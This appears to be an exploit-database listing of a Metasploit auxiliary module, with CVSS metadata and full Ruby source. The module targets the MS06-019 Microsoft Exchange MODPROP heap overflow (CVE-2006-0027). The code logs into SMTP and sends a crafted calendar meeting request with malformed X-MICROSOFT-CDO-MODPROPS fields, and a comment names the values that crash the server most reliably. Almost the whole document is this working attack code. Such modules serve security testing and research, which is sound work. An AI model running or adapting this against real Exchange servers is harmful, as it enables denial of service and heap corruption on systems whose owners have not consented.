MS06-019 Exchange MODPROP Heap Overflow

2024-08-3100:00:00

Jay Turla, metasploit.com

packetstormsecurity.com

metasploit

remote

smtp

heap overflow

microsoft exchange

modprop

vcal request

bid 17908

cve 2006-0027

msb ms06-019

disclosuredate 2004-11-12

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.4

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Smtp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',  
'Description' => %q{  
This module triggers a heap overflow vulnerability in MS  
Exchange that occurs when multiple malformed MODPROP values  
occur in a VCAL request.  
},  
'Author' => [ 'pusscat' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'BID', '17908'],  
[ 'CVE', '2006-0027'],  
[ 'MSB', 'MS06-019'],  
  
],  
'DisclosureDate' => '2004-11-12'))  
  
register_options(  
[  
OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])  
])  
  
end  
  
#  
# This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class  
#  
def run  
  
connect_login  
  
modprops = ['attendee', 'categories', 'class', 'created', 'description',  
'dtstamp', 'duration', 'last-modified',  
'location', 'organizer', 'priority', 'recurrence-id', 'sequence',  
'status', 'summary', 'transp', 'uid']  
  
#modprops = ['dtstamp']  
  
modpropshort = ""  
modpropbusted = ""  
modnum = rand(3)  
  
1.upto(modnum) {  
nextprop = rand(modprops.size)  
modpropshort << modprops[nextprop] + ","  
modpropbusted << modprops[nextprop].upcase + ":\r\n"  
}  
  
modpropshort = "dtstamp,"  
modpropbusted = "DTSTAMP:\r\n"  
modnum = modnum + 1 + rand(3)  
modproplong = modpropshort  
1.upto(modnum) {  
modproplong << modprops[rand(modprops.size)] + ","  
}  
  
boundary = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)  
  
  
# Really, the randomization above only crashes /sometimes/ - it's MUCH more  
# reliable, and gives crashes in better spots of you use these modprops:  
  
modpropshort = "dtstamp,"  
modproplong = "dtstamp, dtstamp,"  
modpropbusted = "DTSTAMP:\r\n"  
  
mail = "From: #{datastore['MAILFROM']}\r\n"  
mail << "To: #{datastore['MAILTO']}\r\n"  
mail << "Subject: #{datastore['SUBJECT']}\r\n"  
mail << "Content-class: urn:content-classes:calendarmessage\r\n"  
mail << "MIME-Version: 1.0\r\n"  
mail << "Content-Type: multipart/alternative;boundary=\"#{boundary}\"\r\n"  
mail << "X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0\r\n"  
mail << "\r\n"  
mail << "--#{boundary}\r\n"  
mail << "Content-class: urn:content-classes:calendarmessage\r\n"  
mail << "Content-Type: text/calendar; method=REQUEST; name=\"meeting.ics\"\r\n"  
mail << "Content-Transfer-Encoding: 8bit\r\n"  
mail << "\r\n"  
mail << "BEGIN:VCALENDAR\r\n"  
mail << "BEGIN:VEVENT\r\n"  
mail << "X-MICROSOFT-CDO-MODPROPS:#{modpropshort.chop}\r\n"  
mail << modpropbusted  
mail << "END:VEVENT\r\n"  
mail << "BEGIN:VEVENT\r\n"  
mail << "X-MICROSOFT-CDO-MODPROPS:#{modproplong.chop}\r\n"  
mail << "END:VEVENT\r\n"  
mail << "END:VCALENDAR\r\n"  
mail << "\r\n--#{boundary}\r\n"  
mail << "\r\n.\r\n"  
  
  
print_status("Sending message...")  
sock.put(mail)  
sock.put("QUIT\r\n")  
print "<< " + (sock.get_once || '')  
disconnect  
end  
end  
`